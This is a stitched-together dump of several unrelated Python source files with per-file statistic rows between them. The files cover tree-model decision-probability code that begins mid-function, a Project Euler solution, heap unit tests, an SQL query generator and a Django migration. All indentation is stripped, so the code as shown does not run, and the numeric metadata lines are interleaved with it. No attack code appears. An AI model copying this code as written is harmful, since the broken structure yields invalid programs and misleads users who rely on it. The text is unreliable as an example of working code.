p_s = np.prod([data[:, s] == x[s] for s in S], axis=0)
p_su = np.sum(p_s * up_tx)
p_sd = np.sum(p_s * down_tx)
p_ss = np.sum(p_s)
mean_forest[i, 0] += (np.sum(lm * p_s) * value ** 2) / (p_ss) if p_ss != 0 else 0
mean_forest[i, 0] -= (2 * fX[i] * np.sum(lm * p_s) * value) / (
p_ss) if p_ss != 0 else 0
mean_forest[i, 1] += (np.sum(lm * p_s * up_tx) * value ** 2) / (
p_su) if p_su != 0 else 0
mean_forest[i, 1] -= (2 * fX[i] * np.sum(lm * p_s * up_tx) * value) / (
p_su) if p_su != 0 else 0
mean_forest[i, 2] += (np.sum(lm * p_s * down_tx) * value ** 2) / (
p_sd) if p_sd != 0 else 0
mean_forest[i, 2] -= (2 * fX[i] * np.sum(lm * p_s * down_tx) * value) / (
p_sd) if p_sd != 0 else 0
else:
for leaf_numb_b in range(model.leaves_nb[b]):
leaf_id_b = model.leaf_idx_trees[b, leaf_numb_b]
leaf_part_b = model.partition_leaves_trees[b][leaf_numb_b]
for leaf_numb_l in range(model.leaves_nb[l]):
leaf_id_l = model.leaf_idx_trees[l, leaf_numb_l]
value_b = model.values[b, leaf_id_b]
leaf_part_l = model.partition_leaves_trees[l][leaf_numb_l]
value_l = model.values[l, leaf_id_l]
leaf_bool = np.prod([(X[:, s] <= leaf_part_b[s, 1]) * (X[:, s] >= leaf_part_b[s, 0]) *
(X[:, s] <= leaf_part_l[s, 1]) * (X[:, s] >= leaf_part_l[s, 0])
for s in S], axis=0)
if np.sum(leaf_bool) == 0.:
continue
lm = np.prod([(data[:, s] <= leaf_part_b[s, 1]) * (data[:, s] >= leaf_part_b[s, 0]) *
(data[:, s] <= leaf_part_l[s, 1]) * (data[:, s] >= leaf_part_l[s, 0])
for s in index], axis=0)
for i, x in enumerate(X):
if leaf_bool[i] == 0:
continue
dist = (y_pred - fX[i]) ** 2
up_tx = np.array(dist > tX).reshape(-1)
down_tx = np.array(dist <= tX).reshape(-1)
p_s = np.prod([data[:, s] == x[s] for s in S], axis=0)
p_su = np.sum(p_s * up_tx)
p_sd = np.sum(p_s * down_tx)
p_ss = np.sum(p_s)
mean_forest[i, 0] += (np.sum(lm * p_s) * value_b * value_l) / (
p_ss) if p_ss != 0 else 0
mean_forest[i, 1] += (np.sum(lm * p_s * up_tx) * value_b * value_l) / (
p_su) if p_su != 0 else 0
mean_forest[i, 2] += (np.sum(lm * p_s * down_tx) * value_b * value_l) / (
p_sd) if p_sd != 0 else 0
num = mean_forest[:, 1] - mean_forest[:, 0]
den = mean_forest[:, 1] - mean_forest[:, 2]
sdp = np.true_divide(num, den, out=np.zeros(N), where=den != 0)
return sdp * (0 <= sdp) * (sdp <= 1) + np.ones(N) * (sdp > 1) + np.zeros(N) * (sdp < 0)
def compute_sdp_clf_cat(X, tX, model, S, data):
N = X.shape[0]
index = list(range(X.shape[1]))
if len(S) == len(index):
return np.ones(N)
elif S == []:
return np.zeros(N)
n_trees = len(model.trees)
y_pred = model.predict(data)
fX = model.predict(X)
if len(y_pred.shape) == 1:
y_pred = np.array([1 - y_pred, y_pred]).T
fX = np.array([1 - fX, fX]).T
argmax_y_pred = np.argmax(y_pred, axis=1)
fX = np.argmax(fX, axis=1)
mean_forest = np.zeros((N, 3, model.values.shape[2]))
for b in range(n_trees):
leaves_tree = model.partition_leaves_trees[b]
for leaf_numb in range(model.leaves_nb[b]):
leaf_part = leaves_tree[leaf_numb]
leaf_id = model.leaf_idx_trees[b, leaf_numb]
value = model.values[b, leaf_id]
leaf_bool = np.prod([(X[:, s] <= leaf_part[s, 1]) * (X[:, s] >= leaf_part[s, 0]) for s in S], axis=0)
if np.sum(leaf_bool) == 0:
continue
lm = np.prod([(data[:, s] <= leaf_part[s, 1]) * (data[:, s] >= leaf_part[s, 0]) for s in index], axis=0)
for i, x in enumerate(X):
if leaf_bool[i] == 0:
continue
up_tx = np.array(argmax_y_pred == int(fX[i])).reshape(-1)
down_tx = np.array(argmax_y_pred != int(fX[i])).reshape(-1)
p_s = np.prod([data[:, s] == x[s] for s in S], axis=0)
p_su = np.sum(p_s * up_tx)
p_sd = np.sum(p_s * down_tx)
p_ss = np.sum(p_s)
mean_forest[i, 0] += (np.sum(lm * p_s) * value) / p_ss if p_ss != 0 else 0
mean_forest[i, 1] += (np.sum(lm * p_s * up_tx) * value) / p_su if p_su != 0 else 0
mean_forest[i, 2] += (np.sum(lm * p_s * down_tx) * value) / p_sd if p_sd != 0 else 0
num = mean_forest[:, 0] - mean_forest[:, 2]
den = mean_forest[:, 1] - mean_forest[:, 2]
sdp = np.true_divide(num, den, out=np.zeros_like(den), where=den != 0)
sdp = np.array([sdp[i][int(fX[i])] for i in range(N)])
return sdp * (0 <= sdp) * (sdp <= 1) + np.ones(N) * (sdp > 1) + np.zeros(N) * (sdp < 0)
def compute_sdp_clf(X, tX, model, S, data):
N = X.shape[0]
index = list(range(X.shape[1]))
if len(S) == len(index):
return np.ones(N)
elif S == []:
return np.zeros(N)
n_trees = len(model.trees)
y_pred = model.predict(data)
fX = model.predict(X)
if len(y_pred.shape) == 1:
y_pred = np.array([1 - y_pred, y_pred]).T
fX = np.array([1 - fX, fX]).T
argmax_y_pred = np.argmax(y_pred, axis=1)
fX = np.argmax(fX, axis=1)
mean_forest = np.zeros((N, 3, model.values.shape[2]))
for b in range(n_trees):
leaves_tree = model.partition_leaves_trees[b]
for leaf_numb in range(model.leaves_nb[b]):
leaf_part = leaves_tree[leaf_numb]
leaf_id = model.leaf_idx_trees[b, leaf_numb]
value = model.values[b, leaf_id]
leaf_bool = np.prod([(X[:, s] <= leaf_part[s, 1]) * (X[:, s] >= leaf_part[s, 0]) for s in S], axis=0)
if np.sum(leaf_bool) == 0:
continue
lm = np.prod([(data[:, s] <= leaf_part[s, 1]) * (data[:, s] >= leaf_part[s, 0]) for s in index], axis=0)
p_s = np.prod([(data[:, s] <= leaf_part[s, 1]) * (data[:, s] >= leaf_part[s, 0]) for s in
S], axis=0)
for i, x in enumerate(X):
if leaf_bool[i] == 0:
continue
up_tx = np.array(argmax_y_pred == int(fX[i])).reshape(-1)
down_tx = np.array(argmax_y_pred != int(fX[i])).reshape(-1)
p_su = np.sum(p_s * up_tx)
p_sd = np.sum(p_s * down_tx)
p_ss = np.sum(p_s)
mean_forest[i, 0] += (np.sum(lm) * value) / p_ss if p_ss != 0 else 0
mean_forest[i, 1] += (np.sum(lm * up_tx) * value) / p_su if p_su != 0 else 0
mean_forest[i, 2] += (np.sum(lm * down_tx) * value) / p_sd if p_sd != 0 else 0
num = mean_forest[:, 0] - mean_forest[:, 2]
den = mean_forest[:, 1] - mean_forest[:, 2]
sdp = np.true_divide(num, den, out=np.zeros_like(den), where=den != 0)
sdp = np.array([sdp[i][int(fX[i])] for i in range(N)])
sdp = sdp * (0 <= sdp) * (sdp <= 1) + np.ones(N) * (sdp > 1) + np.zeros(N) * (sdp < 0)
return sdp
def single_msdp(x, S, model, rg_data):
# fx = np.argmax(model.predict(x), axis=1) # for acvtree
fx = model.predict(x.reshape(1, -1))
d = x.shape[0]
data = rg_data.copy()
data[:, S] = x[S]
if len(S) != d:
# y_pred = np.argmax(model.predict(data), axis=1) # for acvtree
y_pred = model.predict(data)
sdp = np.mean(y_pred == fx)
return sdp
return 1
def msdp_mthread(X, S, model, rg_data):
mthread = Pool()
sdp = np.array(mthread.map(partial(single_msdp, S=S, model=model, rg_data=rg_data), X))
mthread.close()
mthread.join()
return sdp
def msdp(X, S, model, rg_data):
sdp = np.zeros((X.shape[0]))
for i in range(X.shape[0]):
sdp[i] = single_msdp(X[i], S, model, rg_data)
return sdp
def importance_msdp_clf_search(X, model, rg_data, C=[[]], minimal=1, global_proba=0.9, r_search_space=None, stop=True):
N = X.shape[0]
m = X.shape[1]
sdp = np.zeros((N))
sdp_global = np.zeros((m))
len_s_star = np.zeros((N), dtype=np.int)
R, r = [], []
for i in range(N):
R.append(i)
R_buf = np.zeros((N), dtype=np.int)
if r_search_space == None:
search_space = [i for i in range(m)]
else:
search_space = r_search_space.copy()
if C[0] != []:
remove_va = [C[ci][cj] for ci in range(len(C)) for cj in range(len(C[ci]))]
va_id = [[i] for i in search_space if i not in remove_va]
for ci in range(len(C)):
i = 0
for cj in range(len(C[ci])):
if C[ci][cj] in search_space:
i += 1
break
if i != 0:
va_id += [C[ci]]
else:
va_id = [[i] for i in search_space]
m = len(va_id)
power = []
max_size = 0
for size in range(m + 1):
power_b = []
for co in itertools.combinations(va_id, size):
power_b.append(np.array(sum(list(co), [])))
max_size += 1
power.append(power_b)
if max_size >= 2 ** 15:
break
power_cpp = power
s_star = -1 * np.ones((N, X.shape[1]), dtype=np.int)
S = np.zeros((X.shape[1]), dtype=np.int)
for s_0 in tqdm(range(minimal, m + 1)):
for s_1 in range(0, len(power_cpp[s_0])):
for i in range(len(power_cpp[s_0][s_1])):
S[i] = power_cpp[s_0][s_1][i]
S_size = len(power_cpp[s_0][s_1])
r = []
N = len(R)
for i in range(N):
R_buf[i] = R[i]
sdp_b = msdp(X, S[:S_size], model, rg_data)
for i in range(N):
if sdp_b[R_buf[i]] >= sdp[R_buf[i]]:
sdp[R_buf[i]] = sdp_b[R_buf[i]]
len_s_star[R_buf[i]] = S_size
for s in range(S_size):
s_star[R_buf[i], s] = S[s]
if S_size == X.shape[1]:
sdp[R_buf[i]] = 1
len_s_star[R_buf[i]] = S_size
for s in range(S_size):
s_star[R_buf[i], s] = S[s]
for i in range(N):
if sdp[R_buf[i]] >= global_proba:
r.append(R[i])
for s in range(len_s_star[R_buf[i]], X.shape[1]): # to filter (important for coalition)
s_star[R_buf[i], s] = -1
for s in range(len_s_star[R_buf[i]]):
sdp_global[s_star[R_buf[i], s]] += 1
for i in range(len(r)):
R.remove(r[i])
if (len(R) == 0 or S_size >= X.shape[1] / 2) and stop:
break
return np.asarray(sdp_global) / X.shape[0], np.array(s_star, dtype=np.long), np.array(len_s_star,
dtype=np.long), np.array(sdp)
def single_msdp_reg(x, S, model, rg_data, threshold=0.2):
fx = model.predict(x.reshape(1, -1))
d = x.shape[0]
data = rg_data.copy()
data[:, S] = x[S]
if len(S) != d:
y_pred = model.predict(data)
sdp = np.mean(np.abs(y_pred - fx) <= threshold)
return sdp
return 1
def msdp_reg_mthread(X, S, model, rg_data, threshold=0.2):
mthread = Pool()
sdp = np.array(mthread.map(partial(single_msdp_reg, S=S, model=model, rg_data=rg_data, threshold=threshold), X))
mthread.close()
mthread.join()
return sdp
def msdp_reg(X, S, model, rg_data, threshold=0.2):
sdp = np.zeros((X.shape[0]))
for i in range(X.shape[0]):
sdp[i] = single_msdp_reg(X[i], S, model, rg_data, threshold)
return sdp
def importance_msdp_reg_search(X, model, rg_data, C=[[]], minimal=1, global_proba=0.9, threshold=0.2, r_search_space=None, stop=True):
N = X.shape[0]
m = X.shape[1]
sdp = np.zeros((N))
sdp_global = np.zeros((m))
len_s_star = np.zeros((N), dtype=np.int)
R, r = [], []
for i in range(N):
R.append(i)
R_buf = np.zeros((N), dtype=np.int)
if r_search_space == None:
search_space = [i for i in range(m)]
else:
search_space = r_search_space.copy()
if C[0] != []:
remove_va = [C[ci][cj] for ci in range(len(C)) for cj in range(len(C[ci]))]
va_id = [[i] for i in search_space if i not in remove_va]
for ci in range(len(C)):
i = 0
for cj in range(len(C[ci])):
if C[ci][cj] in search_space:
i += 1
break
if i != 0:
va_id += [C[ci]]
else:
va_id = [[i] for i in search_space]
m = len(va_id)
power = []
max_size = 0
for size in range(m + 1):
power_b = []
for co in itertools.combinations(va_id, size):
power_b.append(np.array(sum(list(co), [])))
max_size += 1
power.append(power_b)
if max_size >= 2 ** 15:
break
power_cpp = power
s_star = -1 * np.ones((N, X.shape[1]), dtype=np.int)
S = np.zeros((X.shape[1]), dtype=np.int)
for s_0 in tqdm(range(minimal, m + 1)):
for s_1 in range(0, len(power_cpp[s_0])):
for i in range(len(power_cpp[s_0][s_1])):
S[i] = power_cpp[s_0][s_1][i]
S_size = len(power_cpp[s_0][s_1])
r = []
N = len(R)
for i in range(N):
R_buf[i] = R[i]
sdp_b = msdp_reg(X, S[:S_size], model, rg_data, threshold)
for i in range(N):
if sdp_b[R_buf[i]] >= sdp[R_buf[i]]:
sdp[R_buf[i]] = sdp_b[R_buf[i]]
len_s_star[R_buf[i]] = S_size
for s in range(S_size):
s_star[R_buf[i], s] = S[s]
if S_size == X.shape[1]:
sdp[R_buf[i]] = 1
len_s_star[R_buf[i]] = S_size
for s in range(S_size):
s_star[R_buf[i], s] = S[s]
for i in range(N):
if sdp[R_buf[i]] >= global_proba:
r.append(R[i])
for s in range(len_s_star[R_buf[i]], X.shape[1]): # to filter (important for coalition)
s_star[R_buf[i], s] = -1
for s in range(len_s_star[R_buf[i]]):
sdp_global[s_star[R_buf[i], s]] += 1
for i in range(len(r)):
R.remove(r[i])
if (len(R) == 0 or S_size >= X.shape[1] / 2) and stop:
break
return np.asarray(sdp_global) / X.shape[0], np.array(s_star, dtype=np.long), np.array(len_s_star,
dtype=np.long), np.array(sdp)
| 37.945455 | 134 | 0.450843 | 3,473 | 22,957 | 2.784336 | 0.039159 | 0.037642 | 0.037229 | 0.032265 | 0.967632 | 0.96122 | 0.944054 | 0.940331 | 0.927198 | 0.919338 | 0 | 0.024019 | 0.401533 | 22,957 | 604 | 135 | 38.008278 | 0.679817 | 0.015943 | 0 | 0.887417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02649 | false | 0 | 0.015453 | 0 | 0.090508 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
918adb2fe21d4587d6dfea6363d48258fd5267f4 | 1,229 | py | Python | solved/8.py | back-yard/euler | 3527f92f661a7767b22cf7fe8c50db542c6a9d99 | [
"MIT"
] | null | null | null | solved/8.py | back-yard/euler | 3527f92f661a7767b22cf7fe8c50db542c6a9d99 | [
"MIT"
] | null | null | null | solved/8.py | back-yard/euler | 3527f92f661a7767b22cf7fe8c50db542c6a9d99 | [
"MIT"
] | null | null | null | # https://projecteuler.net/problem=8
num = """
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450
"""
num = num.replace('\n', '').strip()
print max([reduce(lambda x, y: x*y, [int(i) for i in item]) for item in [num[i:i + 13] for i in range(len(num) - 13)]])
| 43.892857 | 119 | 0.913751 | 59 | 1,229 | 19.033898 | 0.728814 | 0.003562 | 0.010686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.855319 | 0.043938 | 1,229 | 27 | 120 | 45.518519 | 0.100426 | 0.027665 | 0 | 0 | 0 | 0 | 0.857502 | 0.838223 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.041667 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9196f5473fbeedf0c981fe178851f643cf1978cb | 95 | py | Python | karabo/util/__init__.py | i4Ds/Karabo-Pipeline | c9a7f120b08b56af93bb953e284b33c107fd865c | [
"MIT"
] | null | null | null | karabo/util/__init__.py | i4Ds/Karabo-Pipeline | c9a7f120b08b56af93bb953e284b33c107fd865c | [
"MIT"
] | 42 | 2022-01-27T14:12:46.000Z | 2022-03-31T14:21:26.000Z | karabo/util/__init__.py | i4Ds/Karabo-Pipeline | c9a7f120b08b56af93bb953e284b33c107fd865c | [
"MIT"
] | null | null | null | from karabo.util.jupyter import set_rascil_data_directory_env
set_rascil_data_directory_env()
| 23.75 | 61 | 0.894737 | 15 | 95 | 5.133333 | 0.666667 | 0.233766 | 0.337662 | 0.571429 | 0.649351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063158 | 95 | 3 | 62 | 31.666667 | 0.865169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
37d630701d9ecc0e08f6887a591810126dcda169 | 4,550 | py | Python | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/projects-DS/Data-Structures/heap/test_generic_heap.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 5 | 2021-06-02T23:44:25.000Z | 2021-12-27T16:21:57.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/projects-DS/Data-Structures/heap/test_generic_heap.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 22 | 2021-05-31T01:33:25.000Z | 2021-10-18T18:32:39.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/projects-DS/Data-Structures/heap/test_generic_heap.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 3 | 2021-06-19T03:37:47.000Z | 2021-08-31T00:49:51.000Z | import unittest
from unittest.mock import MagicMock
from generic_heap import Heap
class HeapTests(unittest.TestCase):
def setUp(self):
self.heap = Heap()
def test_default_heap_insert_works(self):
self.heap.insert(6)
self.heap.insert(8)
self.heap.insert(10)
self.heap.insert(9)
self.heap.insert(1)
self.heap.insert(9)
self.heap.insert(9)
self.heap.insert(5)
self.assertEqual(self.heap.storage, [10, 9, 9, 6, 1, 8, 9, 5])
def test_default_get_priority_works(self):
self.heap.insert(6)
self.heap.insert(8)
self.heap.insert(10)
self.heap.insert(9)
self.heap.insert(1)
self.heap.insert(9)
self.heap.insert(9)
self.heap.insert(5)
self.assertEqual(self.heap.get_size(), 8)
self.assertEqual(self.heap.get_priority(), 10)
def test_default_get_priority_after_delete(self):
self.heap.insert(6)
self.heap.insert(8)
self.heap.insert(10)
self.heap.insert(9)
self.heap.insert(1)
self.heap.insert(9)
self.heap.insert(9)
self.heap.insert(5)
self.heap.delete()
self.assertEqual(self.heap.get_priority(), 9)
self.heap.delete()
self.assertEqual(self.heap.get_priority(), 9)
self.heap.delete()
self.assertEqual(self.heap.get_priority(), 9)
self.heap.delete()
self.assertEqual(self.heap.get_priority(), 8)
self.heap.delete()
self.assertEqual(self.heap.get_priority(), 6)
def test_default_delete_elements_in_order(self):
self.heap.insert(6)
self.heap.insert(7)
self.heap.insert(5)
self.heap.insert(8)
self.heap.insert(10)
self.heap.insert(1)
self.heap.insert(2)
self.heap.insert(5)
descending_order = []
while self.heap.get_size() > 0:
descending_order.append(self.heap.delete())
self.assertEqual(descending_order, [10, 8, 7, 6, 5, 5, 2, 1])
def test_custom_heap_insert_works(self):
self.heap = Heap(lambda x, y: x < y)
self.heap.insert(6)
self.heap.insert(8)
self.heap.insert(10)
self.heap.insert(9)
self.heap.insert(1)
self.heap.insert(9)
self.heap.insert(9)
self.heap.insert(5)
self.assertEqual(self.heap.storage, [1, 5, 9, 6, 8, 10, 9, 9])
def test_custom_get_priority_works(self):
self.heap = Heap(lambda x, y: x < y)
self.heap.insert(6)
self.heap.insert(8)
self.heap.insert(10)
self.heap.insert(9)
self.heap.insert(1)
self.heap.insert(9)
self.heap.insert(9)
self.heap.insert(5)
self.assertEqual(self.heap.get_size(), 8)
self.assertEqual(self.heap.get_priority(), 1)
def test_custom_get_priority_after_delete(self):
self.heap = Heap(lambda x, y: x < y)
self.heap.insert(6)
self.heap.insert(8)
self.heap.insert(10)
self.heap.insert(9)
self.heap.insert(1)
self.heap.insert(9)
self.heap.insert(9)
self.heap.insert(5)
self.heap.delete()
self.assertEqual(self.heap.get_priority(), 5)
self.heap.delete()
self.assertEqual(self.heap.get_priority(), 6)
self.heap.delete()
self.assertEqual(self.heap.get_priority(), 8)
self.heap.delete()
self.assertEqual(self.heap.get_priority(), 9)
self.heap.delete()
self.assertEqual(self.heap.get_priority(), 9)
def test_custom_delete_elements_in_order(self):
self.heap = Heap(lambda x, y: x < y)
self.heap.insert(6)
self.heap.insert(7)
self.heap.insert(5)
self.heap.insert(8)
self.heap.insert(10)
self.heap.insert(1)
self.heap.insert(2)
self.heap.insert(5)
ascending_order = []
while self.heap.get_size() > 0:
ascending_order.append(self.heap.delete())
self.assertEqual(ascending_order, [1, 2, 5, 5, 6, 7, 8, 10])
def test_bubble_up_was_called(self):
self.heap._bubble_up = MagicMock()
self.heap.insert(5)
self.assertTrue(self.heap._bubble_up.called)
def test_sift_down_was_called(self):
self.heap._sift_down = MagicMock()
self.heap.insert(10)
self.heap.insert(11)
self.heap.delete()
self.assertTrue(self.heap._sift_down.called)
if __name__ == "__main__":
unittest.main()
| 29.738562 | 70 | 0.6 | 634 | 4,550 | 4.175079 | 0.086751 | 0.323385 | 0.354363 | 0.102002 | 0.828485 | 0.78504 | 0.769173 | 0.675482 | 0.673971 | 0.673971 | 0 | 0.038899 | 0.265495 | 4,550 | 152 | 71 | 29.934211 | 0.753142 | 0 | 0 | 0.734375 | 0 | 0 | 0.001758 | 0 | 0 | 0 | 0 | 0 | 0.15625 | 1 | 0.085938 | false | 0 | 0.023438 | 0 | 0.117188 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
37d8b74c7083900d5a16923a131788ac71457a0a | 703 | py | Python | generates_sql/bfsout_make_queries_per_year.py | zhuowei/FamilinxAnalysis | 333b24eb173b6d070d7f824024ee6ca0f8a60b2c | [
"MIT"
] | 2 | 2019-01-25T13:46:56.000Z | 2020-11-26T13:55:29.000Z | generates_sql/bfsout_make_queries_per_year.py | zhuowei/FamilinxAnalysis | 333b24eb173b6d070d7f824024ee6ca0f8a60b2c | [
"MIT"
] | null | null | null | generates_sql/bfsout_make_queries_per_year.py | zhuowei/FamilinxAnalysis | 333b24eb173b6d070d7f824024ee6ca0f8a60b2c | [
"MIT"
] | null | null | null | for i in range(1800, 1900):
basic_query = "select count(1) from profiles_bfsjoined where birth_year is not null and death_year is not null and birth_year > 1700 and birth_year <= {} and death_year >= {}".format(i, i)
print(basic_query + ";")
#print(basic_query + " and gender = 'male';")
#print(basic_query + " and gender = 'female';")
for i in range(1900, 2011):
basic_query = "select count(1) from profiles_bfsjoined where birth_year is not null and birth_year > 1700 and birth_year <= {} and ((death_year is not null and death_year >= {}) or is_alive = true)".format(i, i)
print(basic_query + ";")
#print(basic_query + " and gender = 'male';")
#print(basic_query + " and gender = 'female';")
| 63.909091 | 212 | 0.694168 | 112 | 703 | 4.169643 | 0.285714 | 0.171306 | 0.192719 | 0.111349 | 0.890792 | 0.890792 | 0.890792 | 0.835118 | 0.835118 | 0.835118 | 0 | 0.044143 | 0.162162 | 703 | 10 | 213 | 70.3 | 0.748727 | 0.256046 | 0 | 0.333333 | 0 | 0.333333 | 0.660886 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
37e49d4e979c938a94f7064b82893d6014c3cdb6 | 36,698 | py | Python | bmcore/migrations/0005_auto_20171028_1329.py | hchockarprasad/bmdjango | a978e4bca264eaa5a1f21df332f7da06f9f69ee5 | [
"MIT"
] | 3 | 2017-10-29T13:37:58.000Z | 2017-11-06T15:31:35.000Z | bmcore/migrations/0005_auto_20171028_1329.py | hchockarprasad/bmdjango | a978e4bca264eaa5a1f21df332f7da06f9f69ee5 | [
"MIT"
] | null | null | null | bmcore/migrations/0005_auto_20171028_1329.py | hchockarprasad/bmdjango | a978e4bca264eaa5a1f21df332f7da06f9f69ee5 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-28 07:59
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('bmcore', '0004_auto_20171028_1114'),
]
operations = [
migrations.CreateModel(
name='CashierCashDisplayReport',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('voucher_no', models.CharField(blank=True, max_length=10, null=True)),
('voucher_type', models.CharField(blank=True, max_length=30, null=True)),
('cashier_id', models.IntegerField()),
('voucher_id', models.IntegerField()),
('checked', models.BooleanField(default=False)),
('viewed', models.BooleanField(default=False)),
('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('created_by', models.CharField(blank=True, max_length=50, null=True)),
],
options={
'managed': False,
},
),
migrations.CreateModel(
name='PendingDisplay',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('account_id', models.IntegerField()),
('account_name', models.CharField(max_length=100)),
('ref_no', models.CharField(max_length=40)),
('bill_amount', models.DecimalField(decimal_places=2, max_digits=20)),
('adjusted', models.DecimalField(decimal_places=2, max_digits=20)),
('adj_id', models.IntegerField()),
('branch_id', models.IntegerField()),
('branch_name', models.CharField(max_length=100)),
],
options={
'managed': False,
},
),
migrations.CreateModel(
name='SaleBatchDisplay',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('batch_id', models.IntegerField()),
('batch_name', models.CharField(max_length=45)),
('exp_month', models.IntegerField()),
('exp_year', models.IntegerField()),
('stock', models.IntegerField()),
('mrp', models.DecimalField(decimal_places=2, max_digits=20)),
('s_disc', models.DecimalField(decimal_places=2, max_digits=20)),
('inventory_id', models.IntegerField()),
('inventory_name', models.CharField(max_length=100)),
('bwd', models.BooleanField()),
('tax_id', models.IntegerField()),
('tax_name', models.CharField(max_length=45)),
('tax_sgst_ratio', models.DecimalField(decimal_places=2, max_digits=20)),
('tax_cgst_ratio', models.DecimalField(decimal_places=2, max_digits=20)),
('tax_igst_ratio', models.DecimalField(decimal_places=2, max_digits=20)),
('rack_id', models.IntegerField()),
('rack_name', models.CharField(max_length=10)),
('pack_id', models.IntegerField()),
('pack_name', models.CharField(max_length=10)),
('pack_conv', models.IntegerField()),
],
options={
'managed': False,
},
),
migrations.CreateModel(
name='TaxSummaryDisplay',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('voucher_id', models.IntegerField()),
('voucher_type', models.CharField(max_length=45)),
('voucher_no', models.CharField(max_length=45)),
('tax_id', models.IntegerField()),
('tax_name', models.CharField(max_length=45)),
('amount_value', models.DecimalField(decimal_places=2, max_digits=20)),
('cgst_value', models.DecimalField(decimal_places=2, max_digits=20)),
('sgst_value', models.DecimalField(decimal_places=2, max_digits=20)),
('igst_value', models.DecimalField(decimal_places=2, max_digits=20)),
('inventory_id', models.IntegerField()),
],
options={
'db_table': 'vw_tax_summary',
'managed': False,
},
),
migrations.CreateModel(
name='VoucherLedger',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bwd', models.BooleanField()),
('name', models.CharField(max_length=55)),
('class_flag', models.IntegerField()),
],
options={
'managed': False,
},
),
migrations.CreateModel(
name='AccountTransaction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('debit', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=20, null=True)),
('credit', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=20, null=True)),
('debit_pend', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('credit_pend', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
('narration', models.CharField(blank=True, max_length=50, null=True)),
('bwd', models.CharField(blank=True, max_length=50, null=True)),
('instrument_no', models.CharField(blank=True, max_length=50, null=True)),
('instrument_date', models.DateField(blank=True, null=True)),
('bank_name', models.CharField(blank=True, max_length=50, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
